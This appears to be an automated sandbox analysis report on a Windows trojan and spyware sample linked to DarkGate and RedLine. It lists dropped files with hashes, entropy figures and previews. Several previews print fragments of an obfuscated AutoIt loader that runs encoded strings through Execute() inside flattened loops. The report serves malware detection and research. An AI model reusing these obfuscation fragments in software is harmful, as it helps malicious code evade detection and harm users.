            Number of analysed new started processes analysed:18
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Tt843YGUx5.exe
            renamed because original name is a hash value
            Original Sample Name:0d6bbe5907ca581fec7c452793aa1257.exe
            Detection:MAL
            Classification:mal80.troj.spyw.evad.winEXE@26/14@3/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 105
            • Number of non-executed functions: 294
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            01:59:06API Interceptor3558x Sleep call for process: Bonta.exe.com modified
            01:59:08API Interceptor3407x Sleep call for process: Pensiero.exe.com modified
            01:59:42API Interceptor3393x Sleep call for process: Inebriarti.exe.com modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comin.exeGet hashmaliciousDarkGate, MailPassViewBrowse
              in.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                KgpiJLs58m.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                  KgpiJLs58m.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                    Notion Setup 4.3.0 (4).exeGet hashmaliciousDarkGate, MailPassViewBrowse
                      Notion Setup 4.3.0 (4).exeGet hashmaliciousDarkGate, MailPassViewBrowse
                        JiH0aUfOU6.exeGet hashmaliciousUnknownBrowse
                          JiH0aUfOU6.exeGet hashmaliciousUnknownBrowse
                            2YLM6BQ9S3.exeGet hashmaliciousRedLineBrowse
                              sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\A

                                Download File
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with very long lines (349), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):1273491
                                Entropy (8bit):5.8531936507300255
                                Encrypted:false
                                SSDEEP:12288:4fLLm1/Avlkk94T9vS62LPWIS36vzh4LBLFiuRJbOyiDZg8wE6B5RRLUvu6cGshx:4zhWkmDshcimJbCKSshIo
                                MD5:32DCB1DD2A8F02DCA8EE1731A6B81A92
                                SHA1:C10FA345252FDEF085C9E0380DC1D043D726CDF5
                                SHA-256:7029D559B92849F5ECA6AB3C48C5025ED5AEB898B0FD88CF7816B99AA4359435
                                SHA-512:63927053F5DC05D5D7F0F4F55EFB2562671AFEB0C70259793C2E69CAEE6BCB6A2E1AA7C6061209AC98BDF85BEA02FC17289D6A8B0DB061230F7D09797667FD8F
                                Malicious:false
                                Preview:..Func NfVmVYAcf($prUAQ,$aZRta,$wVaVmpCY,$BNQqYn,$idENekES,$wRROFGy,$ETECeq,$MSPCu,$PqMHSBAF,$PsmjnaL)..Local $IvvtTotdawlceMYkRtiNyEPWrhrPBTqIwHbhzVSmNloDnzgMgjBGeq = 'rHAqGtgOnqBxcgLSVkIZUvknKYdBfazGqRxFTVjxnvKCWZTbCzGcxwVHcedIOMnyHVzDUyZZZgAbMIBKtSZVMYjZVMlRFDFMXEVwGfDvxGcuAbUNAGDVMDaIIzIiVoxcIOAoMArOfDAyCumnSvdZZKZxkjajHcAjjqbLXMqqCPFpehuCUpfnRxcXPyWAiQuUegTCIOAyvdbltPaYuPabywcSEAVRQmSLILuOzEUyIpeBXlTqNYzsnJPqSwXoSJfWbLCzJ'...$NHOgM = 183..$MTEedhcXvM = 69..While ((10333-10332)*10059)..Switch $NHOgM..Case 176....$RmOhZwiKeLqYhTJ = Execute(rETgxIUQ("68#114#105#118#101#71#101#116#83#101#114#105#97#108#40#39#75#65#111#89#106#69#84#70#106#110#118#75#69#103#106#39#41",0)), $NNUhAqlhU = 'tNBONIeZfPrhpxEeykXoUXaMm'..$135 = 134..For $FbkfRAiskKFcWecPLRVkegNSvagCxZoSLoaUHNFdabwgcMNZdkjcYb = 17 To 28..Local $JdUtyAurnKNHFZ = 'umEAJbVYdLjuxOfZQFLGmpprUnYGApBgXVGqpaNQNsDaTzLfpLW'..Local $RmOhZwiKeLqYhTJ = Execute(rETgxIUQ("79#94#117#107#47#56#58#60#48",7))..Next....$NHOgM = $NHOgM + 1..Case 17

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.vstm

                                Download File
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1987072
                                Entropy (8bit):7.999918819366727
                                Encrypted:true
                                SSDEEP:49152:Z1cp8aUBkOQnyTP5fc/xJ0z5YTXVj0XO6rneN:jaUVQnyTPe/vzVIXWN
                                MD5:98FC7547E88B86C0C1217F60ECCAAFD3
                                SHA1:AE847D9D502B4E4C3763D8226D2E36CABD655F8E
                                SHA-256:4FE8F063DB286F721E9F2B95ED8C2E2B5058CE480FBA1C55CD0E8389693789F5
                                SHA-512:7771B8C853AD8823A4DE7CA4F15B22F27E487266F6F40FA41A4EC94DEA4C015FEF053250662F6C7EFCEC96AA40066608E1846F4C76AFDD93B6BB5A7B1A59F210
                                Malicious:false
                                Preview:j....Cz".J.Ncw'K=......<l....,._..H...p.&-.3J....Q.m..5.....?/^......YX.h.a..w..]....S.c.&w...<K,.m.N..:}/+..`CIC...9.^..Q.=.s.....a.ki%.>.#.}......7.S..?..nF.....h..mU.0.0I....v..;.J.........Z./..b........{U.%.......y..5l..[,Xca,.....BRQ...r*1k.='..24K!.....Sn".......~....[.U..I.9...kCU.c.P.v.{3..*..5...;|...........n\......gP......j[l.T.........o...2I....<.4E.....A'.ujH.3VK...?cY.D.C>_3..<.~.e..=[.E..Llr...E.mq.4...`...A.......;q...j....s>dwd.9>.~v.t.#~4t>9............|..$n.\hsO.1.U..Q4.2.,$q.....Rm.f`/=e.Ud5[WjKD.#'...#...U..c%......K...e...z....M&...k.........W.2F.3!..F.-.W.....)ZL..6........T5..L...J.c`@.r...zfS.yG.?kv......S.....&..S........d.....:_........X...6......1.kv.[......ed....C...`9$.......Z@|f..8..{Y+e.O..-.Q.*h5).a.p....K.:|...pE.,W.L...|)......4..6.....a....Y...).P.(w....6.o.r..}...B.L<..0..w)...d~y:...........w ..5..v..b}..#rg_j~.&[l.)..W.t...g....G.)..#c.+...sL........U'',.X...+....K...U.P..|...:...0..3.-

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com

                                Download File
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):893608
                                Entropy (8bit):6.620131693023677
                                Encrypted:false
                                SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                Joe Sandbox View:
                                • Filename: in.exe, Detection: malicious, Browse
                                • Filename: in.exe, Detection: malicious, Browse
                                • Filename: KgpiJLs58m.exe, Detection: malicious, Browse
                                • Filename: KgpiJLs58m.exe, Detection: malicious, Browse
                                • Filename: Notion Setup 4.3.0 (4).exe, Detection: malicious, Browse
                                • Filename: Notion Setup 4.3.0 (4).exe, Detection: malicious, Browse
                                • Filename: JiH0aUfOU6.exe, Detection: malicious, Browse
                                • Filename: JiH0aUfOU6.exe, Detection: malicious, Browse
                                • Filename: 2YLM6BQ9S3.exe, Detection: malicious, Browse
                                • Filename: sEOELQpFOB.lnk, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Conoscermi.vstm

                                Download File
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:ASCII text, with very long lines (349), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):1273491
                                Entropy (8bit):5.8531936507300255
                                Encrypted:false
                                SSDEEP:12288:4fLLm1/Avlkk94T9vS62LPWIS36vzh4LBLFiuRJbOyiDZg8wE6B5RRLUvu6cGshx:4zhWkmDshcimJbCKSshIo
                                MD5:32DCB1DD2A8F02DCA8EE1731A6B81A92
                                SHA1:C10FA345252FDEF085C9E0380DC1D043D726CDF5
                                SHA-256:7029D559B92849F5ECA6AB3C48C5025ED5AEB898B0FD88CF7816B99AA4359435
                                SHA-512:63927053F5DC05D5D7F0F4F55EFB2562671AFEB0C70259793C2E69CAEE6BCB6A2E1AA7C6061209AC98BDF85BEA02FC17289D6A8B0DB061230F7D09797667FD8F
                                Malicious:false
                                Preview:..Func NfVmVYAcf($prUAQ,$aZRta,$wVaVmpCY,$BNQqYn,$idENekES,$wRROFGy,$ETECeq,$MSPCu,$PqMHSBAF,$PsmjnaL)..Local $IvvtTotdawlceMYkRtiNyEPWrhrPBTqIwHbhzVSmNloDnzgMgjBGeq = 'rHAqGtgOnqBxcgLSVkIZUvknKYdBfazGqRxFTVjxnvKCWZTbCzGcxwVHcedIOMnyHVzDUyZZZgAbMIBKtSZVMYjZVMlRFDFMXEVwGfDvxGcuAbUNAGDVMDaIIzIiVoxcIOAoMArOfDAyCumnSvdZZKZxkjajHcAjjqbLXMqqCPFpehuCUpfnRxcXPyWAiQuUegTCIOAyvdbltPaYuPabywcSEAVRQmSLILuOzEUyIpeBXlTqNYzsnJPqSwXoSJfWbLCzJ'...$NHOgM = 183..$MTEedhcXvM = 69..While ((10333-10332)*10059)..Switch $NHOgM..Case 176....$RmOhZwiKeLqYhTJ = Execute(rETgxIUQ("68#114#105#118#101#71#101#116#83#101#114#105#97#108#40#39#75#65#111#89#106#69#84#70#106#110#118#75#69#103#106#39#41",0)), $NNUhAqlhU = 'tNBONIeZfPrhpxEeykXoUXaMm'..$135 = 134..For $FbkfRAiskKFcWecPLRVkegNSvagCxZoSLoaUHNFdabwgcMNZdkjcYb = 17 To 28..Local $JdUtyAurnKNHFZ = 'umEAJbVYdLjuxOfZQFLGmpprUnYGApBgXVGqpaNQNsDaTzLfpLW'..Local $RmOhZwiKeLqYhTJ = Execute(rETgxIUQ("79#94#117#107#47#56#58#60#48",7))..Next....$NHOgM = $NHOgM + 1..Case 17

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\E

                                Download File
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with very long lines (355), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):1027550
                                Entropy (8bit):5.84399406272364
                                Encrypted:false
                                SSDEEP:12288:t9fFNLEjDpDJ8eEaoImLXqEdqfix+jTxxxBRMQUw716TKi:rfHEJmLqEdbx+XDl16TKi
                                MD5:D8E8946A635B6E3825E6BF3899C8B8C0
                                SHA1:AEB5CF5BFB1A35B3A5AB7CFBB4DD82B1C3FDE9D8
                                SHA-256:8AECFE0A5F0CE53FD6750CC500D8B1EFD4A8EC1AE88E47669B82890BE3854AA8
                                SHA-512:22EF7299178CB6258692F0696C18695E3A6E3AB670CA442DB2E27771149B0866E18C39F87B9DBA51716703FB5108A98B60449DED544CBF40B7BA34C764E31138
                                Malicious:false
                                Preview:..Func FVlqLdSP($ZWK,$cHWg,$pWEmjEg,$tIakCX,$ZiSRQtwCz)..Local $vncVRTprkqcXvbYNiKNxMfegOtnDozlbCQSTIMBsaTMYLU = 'auhcIhfquviuMcGVSPYcFFtyxpceTDrDUIyvUXCljQLbBFOVMYUpNmQNwiwmRhiCaEjtdpqUhOoOTGEOxmdVJUPxSacMWraZIotWzKFCXZVZdwTxDhtsXjTnORjYOhYpcpyKBHxKUNXJYQtQnqpJZqevgGoBnHOJwLDiVoSWSxbpglAYNcmOtfl'...$gQvOptYjh = 101..$GUPKCsbvMtmK = 89..While ((5589-5588)*5398)..Switch $gQvOptYjh..Case 94....$JLnhpRTZoZzBQtKQ = Execute(ekrSXFezU("79#94#117#107#47#93#88#112#105#75#128#81#122#78#80#128#90#93#75#48",7))..$139 = 155..For $vqiVcuLpsMYGeOtxWsqoGFSJafvzDIGyLmNiLRgFMrSyUaykguUN = 13 To 21..Local $ccCMNOqlkybOS = 'rEWqggoWxbpZwbCpanPKgjarzICVnjpUhvRYtWxQUnqtCOMCHwM'..Local $JLnhpRTZoZzBQtKQ = ekrSXFezU("118#118#88#114#90#78#77#83#111#117#112#110#109#84#77#77#75#128#125#121#96#88#87#113#110#72#77#94#120",7)..Next....$gQvOptYjh = $gQvOptYjh + 1..Case 95....$AlVthwMkfPtGqSQ = Execute(ekrSXFezU("74#89#112#102#42#73#91#109#78#86#101#81#99#106#116#43",2))..$52 = 116..For $euXtWdVqsaEXsqJLZwHtxHaEQTug

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Forme.vstm

                                Download File
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):97282
                                Entropy (8bit):7.9980120985450665
                                Encrypted:true
                                SSDEEP:1536:i3RFYe7C/BBbpjlPOOgYEGuIaIizdyySgVYZpiV776kAsFLj9xdFPLtK8UR:i3ge7KBl5PuYEtIjyogVepiw3sFnrGR
                                MD5:C99F4CB6198E1D977A35815A23E2DB8D
                                SHA1:A86E1808982D231AEC56879E3ADC7435387E8DDF
                                SHA-256:69778B5C9C6EA73A1392518AC831659E4377CDC252449D943D8D27E067CDD47F
                                SHA-512:3EF754557EA9D808FB6F0577341005248C553D14E47500DD2F1B7F655DF9BA3224FCC8D661D409BC51C902457BEE000D22AB4DB0E486ECD530DD92A537261584
                                Malicious:false
                                Preview:.l.......R..Tf|d...q.m..C6....f~T..E.......a}.&9pll."..~I...?..v.....{.9...;.Q...[....`.p.....7..n..kP...fV[.fwA..HW.)..`.F.z!9r.`..(7.LJ.B.wD..G..X...F.@e{ ..l.^N..\...v~$d......(.H.....G.+.Lg.K\i|..8....[..Y)v....+s..'...i.y."...iK.~...1...F......sn2...z.}....n..#.o..r.O..l.G.{....g...7.@.y.Z.R..K(.8...6.......~.9..,g...t..w...1.......M@R._.zZ.K)..>....^/.M....-.g...=...%..9.z......>j..@..$...z.dR@....X.V.i.2...!..&..h.-..\Ip/O&.}.....?g.^.`.h.B..v....|......c.......U.O.....P."~...+..Tf...%.F.Y. ...[h"...v..>V`.]..|....@G{`.\.V.].....C.S!m]..e.-...q.2...BD.Ko..x}zv.G..#.)....u.H'8.....S.L..cCk.......(.h..M..-j)B..4..U[@w.U....`...{..wc8./..lS....<e.j&....X.+.3....x...........)....F..I..\R.=...;.Q......R.P....D..h..p7.t[.r.....?.8...44/.g......X..C...d{.C.S.._-.'.F...0../TY..L.....v...."..>.}i...@;...1..n0.....^..[..X..i..G.x p.......$b.}......4...cO....#vN..s.RZ..Zm ..B.1............Wv..Z.7R..._i.C...'...FP....y.\=..U3...`k.....P.

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com

                                Download File
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):893608
                                Entropy (8bit):6.620131693023677
                                Encrypted:false
                                SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Mio.vstm

                                Download File
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):361472
                                Entropy (8bit):7.999543616570439
                                Encrypted:true
                                SSDEEP:6144:STrZVRpJIehzLugXNmiEwlD/9SOjjyAoZK7XrI/g4PxUAshlDaIZYHyjIQmpWz1S:STryedSgXSwlRSOPyAoZK7Mg4P+AshN+
                                MD5:50C2AD1056C3491921514C3D9A8E1EA0
                                SHA1:3326D29C649A3B05C8F09F45F236448876EA30CD
                                SHA-256:052EDA4E7D006E00CE4ACE3337CB907A42BCF5AE0BBFBE2702C4A7B1540FDECE
                                SHA-512:6666CB4F666FB665A55C82FF6C37EEF15432B6F8F02CE02BCEB24614CA8753F39E0885069D75C8B438B89C4A7AEE16810F1DE61F2E7F6DE5B372E8BA22D1A2CD
                                Malicious:false
                                Preview:.Y..HS...Y.?....."...X.;l1.Y..9.k.t.Mk.aS..R.>......%p.......wh...........[!........V.b..."..yf..\h.1z.[o.j:>...\..........$}.......o\..}....r..D.c.0...G;.R}....!9...G.W......e ..he.J=....x....aM..UN..%2O.iz!.8`..R...P.1..c5..=p..f.L.._.-OZ.s.=...q?..|:.....X.n.......9I..V..B.5..u.......!......Nm...1....@.'.4.]q....J..o...JDg...6.V.0]........cerF../.(~.Ey..thEh...P./K.....@..;.Z....q.k~...I..-....[.....$e....?1.....Q9...!rg.Q.E.Y.*..5."..b..s....=*..j...].p_..O'...GSo`.|..:.^s...D.L.....&.6...z..S.p.5u..'...!.....P.t.y...o.....DT&..U..G..'...B[b,!.......z..UML/J..n....+*s.L.....3&....%C..^..A...^d.XP..p&..H..Q...3:...H....}.WV\KO&..1E...?UCs...SX....mw ..M..G"......|....!..W.M..\%......@..S......_o&.4.5.........f...m.t....&x.....^]...>.+.p.<.M...=........".".......7..Uux{.<...Y.I.i^..gO?.....R.e.@... ...\.e.L\..r.....H$.T..M...="........1-.......u.U..'&.......vtC.j.l.......zm'..=....w.0..f.9T.2J.:2..{g...tr.P .L.(5.kVI...{)..Ke.............(.....

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nel.vstm

                                Download File
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:ASCII text, with very long lines (521), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):874247
                                Entropy (8bit):5.845938060923655
                                Encrypted:false
                                SSDEEP:12288:vQfX7AlWSi++7WQ777U5wv7sDqGdZzsAwMmk+1T:n5zbYT
                                MD5:676BE9E97E242CCAA40DE8C8342F2381
                                SHA1:F25CA9A365927163836213172F300B6E9A09311A
                                SHA-256:5B0198597C3BB1582AD4ED0DB205772BE9E54B5F3363C7449EC1477F0A2C172F
                                SHA-512:3AF0610DCC1C3F8253AF454102047828FD431D137593CD083E50BC34AC20516A6C975F7CADEDB9F910F0120FDD3D35E0E267708042A2C1EDAD04C611314426AB
                                Malicious:false
                                Preview:..Func zsQzlxmFuQcHzpEjECX($TFjYd,$umipzZZ,$dLJus,$oCMsKSF,$ZVadMtOtS,$DOzy,$HeIzYhBVv,$hLrAGGN)..Local $kQejVvkTGCCieDtfwmGMnqWKnaLEkvPO = 'FNRqcnCwIgTryIAcsEgxxwlTsOCLHHlMOUbPhfGwtKQMrHaKkoTRBzSDCXIHVQxqtufkkKoeYhdKknQKcSAnOakxeTjdGYuhdPHWsimAqRTgroaruYjedVjLVUosbScZiezcQUahzZnWnXsUBppIM'...$AvqiIzfJvVob = 178..$EebXGMktXNLMmQ = 61..While ((7021-7020)*6462)..Switch $AvqiIzfJvVob..Case 175....$zeoBmgmbAjaJckOE = Execute(GKHRXxdEq("76_91_114_104_44_75_88_73_72_80_108_81_104_102_126_75_124_91_90_101_45",4))..$120 = 103..For $MqfarxXHPTlQSCRWgkqgvubMGbAzrtFbAxokCafIlUKcgGIKAMiZOfmGC = 8 To 21..Local $qPPSsXFJlUCIZGJ = 'FdZiCflsUaktvkXpmyLQtMjOIruCQXxfkDnkvVVKEbYYLBhYXaoTUSK'..Local $zeoBmgmbAjaJckOE = GKHRXxdEq("107_110_110_112_72_66_88",0)..Next....$AvqiIzfJvVob = $AvqiIzfJvVob + 1..Case 176....$TSMMMElwkGNheiQiF = Execute(GKHRXxdEq("74_89_112_102_42_101_84_114_84_68_78_82_111_102_103_123_80_112_89_86_85_72_104_43",2))..$97 = 87..For $OBxaTFikvvAXWwwQHxjlGEJTHryQpsIewrovAAZiFBiOAgJMkkm

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com

                                Download File
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):893608
                                Entropy (8bit):6.620131693023677
                                Encrypted:false
                                SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pure.vstm

                                Download File
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):893732
                                Entropy (8bit):6.620371362753424
                                Encrypted:false
                                SSDEEP:12288:FpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:FT3E53Myyzl0hMf1tr7Caw8M01
                                MD5:C38DC9E91502C7A7246EB673B8E5DD5C
                                SHA1:530C4B86A19B1BE44C01E9F01DBACB0BCFE3DBD7
                                SHA-256:1F4460B9449882C79E61D643AD9FB9A6D6B27779E3C40ACFBA4DFAE751F7D745
                                SHA-512:2824B6746EA1114E885F0AA11D11AC44113AE991544543D6BCB73BC7D4E84C229EC9223136A633C4B0B8695A0E95CC6B21A5CD88C17FAD4088442DCC2EDACEDD
                                Malicious:false
                                Preview:jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA........................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B....................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Secondo.vstm

                                Download File
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:ASCII text, with very long lines (355), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):1027550
                                Entropy (8bit):5.84399406272364
                                Encrypted:false
                                SSDEEP:12288:t9fFNLEjDpDJ8eEaoImLXqEdqfix+jTxxxBRMQUw716TKi:rfHEJmLqEdbx+XDl16TKi
                                MD5:D8E8946A635B6E3825E6BF3899C8B8C0
                                SHA1:AEB5CF5BFB1A35B3A5AB7CFBB4DD82B1C3FDE9D8
                                SHA-256:8AECFE0A5F0CE53FD6750CC500D8B1EFD4A8EC1AE88E47669B82890BE3854AA8
                                SHA-512:22EF7299178CB6258692F0696C18695E3A6E3AB670CA442DB2E27771149B0866E18C39F87B9DBA51716703FB5108A98B60449DED544CBF40B7BA34C764E31138
                                Malicious:false
                                Preview:..Func FVlqLdSP($ZWK,$cHWg,$pWEmjEg,$tIakCX,$ZiSRQtwCz)..Local $vncVRTprkqcXvbYNiKNxMfegOtnDozlbCQSTIMBsaTMYLU = 'auhcIhfquviuMcGVSPYcFFtyxpceTDrDUIyvUXCljQLbBFOVMYUpNmQNwiwmRhiCaEjtdpqUhOoOTGEOxmdVJUPxSacMWraZIotWzKFCXZVZdwTxDhtsXjTnORjYOhYpcpyKBHxKUNXJYQtQnqpJZqevgGoBnHOJwLDiVoSWSxbpglAYNcmOtfl'...$gQvOptYjh = 101..$GUPKCsbvMtmK = 89..While ((5589-5588)*5398)..Switch $gQvOptYjh..Case 94....$JLnhpRTZoZzBQtKQ = Execute(ekrSXFezU("79#94#117#107#47#93#88#112#105#75#128#81#122#78#80#128#90#93#75#48",7))..$139 = 155..For $vqiVcuLpsMYGeOtxWsqoGFSJafvzDIGyLmNiLRgFMrSyUaykguUN = 13 To 21..Local $ccCMNOqlkybOS = 'rEWqggoWxbpZwbCpanPKgjarzICVnjpUhvRYtWxQUnqtCOMCHwM'..Local $JLnhpRTZoZzBQtKQ = ekrSXFezU("118#118#88#114#90#78#77#83#111#117#112#110#109#84#77#77#75#128#125#121#96#88#87#113#110#72#77#94#120",7)..Next....$gQvOptYjh = $gQvOptYjh + 1..Case 95....$AlVthwMkfPtGqSQ = Execute(ekrSXFezU("74#89#112#102#42#73#91#109#78#86#101#81#99#106#116#43",2))..$52 = 116..For $euXtWdVqsaEXsqJLZwHtxHaEQTug

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Seminato.vstm

                                Download File
                                Process:C:\Users\user\Desktop\Tt843YGUx5.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):887
                                Entropy (8bit):5.693418149335726
                                Encrypted:false
                                SSDEEP:24:0qaKlkEa69c5ugSj28H11Ea69c5ugSj012Ea69c5ugSjW5f:PaK2s9c5TUt1s9c5TU012s9c5TUYf
                                MD5:5D6074FE8E2E8ABCD21C10F1501DE567
                                SHA1:7310F114E7A285BD142D4C507153FE2E75A8DAD1
                                SHA-256:06CBDB7E32E9ABFAC14F7B8E2D2F65204E4A088FE816635401D6A704A3EC4178
                                SHA-512:0AEA34C249402009C0074D55AC85972F03AA8E2DA65F7369D14939F6859F0146CD814E1810754E660C2AD8232C40CC4742E974BE3094540D7DD0DE9839160764
                                Malicious:false
